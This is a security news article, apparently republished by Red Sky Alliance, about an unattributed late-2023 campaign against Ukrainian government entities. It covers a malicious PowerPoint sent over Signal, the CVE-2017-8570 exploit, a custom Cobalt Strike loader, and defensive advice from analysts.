The targeted operation utilized CVE-2017-8570 as the initial vector and employed a notable custom loader for Cobalt Strike, yet attribution to any known threat actor remains elusive. An unknown threat actor targeted government entities in Ukraine toward the end of 2023 using an old Microsoft Office remote code execution (RCE) exploit from 2017 (CVE-2017-8570) as the initial vector and military vehicles as the lure.
The threat actor initiated the attack using a malicious PowerPoint file (.PPSX) sent as an attachment through a message on secure messaging platform Signal. This file, which masqueraded as an old instruction manual by the US Army for mine-clearing blades for tanks, had in fact a remote relationship to an external script hosted on a Russian virtual private server (VPS) provider domain protected by Cloudflare.
The script executed the CVE-2017-8570 exploit to achieve RCE, according to a Deep Instinct blog post on the attack last week, in an effort to steal information. In terms of the technical nitty-gritty, the obfuscated script masqueraded as Cisco AnyConnect APN configuration and was responsible for setting persistency, decoding, and saving the embedded payload to disk, which happened in several stages to evade detection.[1]
The payload includes a loader/packer dynamic link library (DLL) named "vpn.sessings" that loads a Cobalt Strike Beacon into memory and awaits instructions from the command-and-control (C2) server of the attacker.
Mark Vaitzman, threat lab team leader at Deep Instinct, notes that the penetration testing tool Cobalt Strike is very commonly used among threat actors, but this particular beacon makes use of a custom loader that relies on several techniques that slow down analysis. "It is continuously updated to provide attackers with a simple way to move laterally once the initial footprint is set," he says. "[And] it was implemented in several anti-analysis and unique evasion techniques."
Vaitzman notes that in 2022, a severe CVE allowing RCE was found in Cobalt Strike — and many researchers predicted that threat actors would alter the tool to create open source alternatives. "Several cracked versions can be found on underground hacking forums," he says. Beyond the tweaked version of Cobalt Strike, he reported, the campaign is also notable for the lengths to which the threat actors continuously attempt to masquerade their files and activity as a legitimate, routine OS and common applications operations, to remain hidden and maintain the control of infected machines as long as possible. In this campaign, he says, the attackers took this "living off the land" strategy further. "This attack campaign shows several masquerading techniques and a smart way of persistence that has not been documented yet," he explains, without divulging details.
Ukraine has been targeted by multiple threat actors on multiple occasions during its war with Russia, with the Sandworm Group serving as the aggressor's primary cyberattack unit.
But unlike in most attack campaigns during the war, the threat lab team could not link this effort to any known threat group, which may indicate that this is the work of a new group or representative of a fully upgraded tool set of a known threat actor. Mayuresh Dani, manager of security research at Qualys Threat Research Unit, points out the use of geographically disparate sources to help the threat actors dispel attribution also make it difficult for security teams to provide targeted protection based on geographical locations. "The sample was uploaded from Ukraine, the second stage was hosted and registered under a Russian VPS provider, and the Cobalt beacon [C2] was registered in Warsaw, Poland," he explains. He says that what he found most interesting about the chain of attack was that the initial compromise was accomplished via the secure Signal app. "The Signal messenger has been largely used by security-focused personnel or those who are involved in sharing clandestine information, such as journalists," he notes.
Vaitzman says that because most cyberattacks start with phishing or link-luring via emails or messages, broader employee cyber awareness plays an important role in mitigating such attack attempts. And for security teams, "We also recommend scanning for the provided IoCs in the network, as well as making sure that Office is patched to the latest version," Vaitzman says.
Callie Guenther, senior manager of cyber threat research at Critical Start, says that from a defense perspective, the reliance on older exploits also stresses the importance of robust patch management systems. "Additionally, the sophistication of the attack underscores the need for advanced detection mechanisms that go beyond signature-based cyber-defense approaches," she says, "incorporating behavior and anomaly detection to identify modified malicious software."
This article is presented at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com
Reporting: https://www.redskyalliance.org/
Website: https://www.redskyalliance.com/
LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5378972949933166424
[1] https://www.darkreading.com/cyberattacks-data-breaches/military-tank-manual-zero-day-ukraine-cyberattack
Comments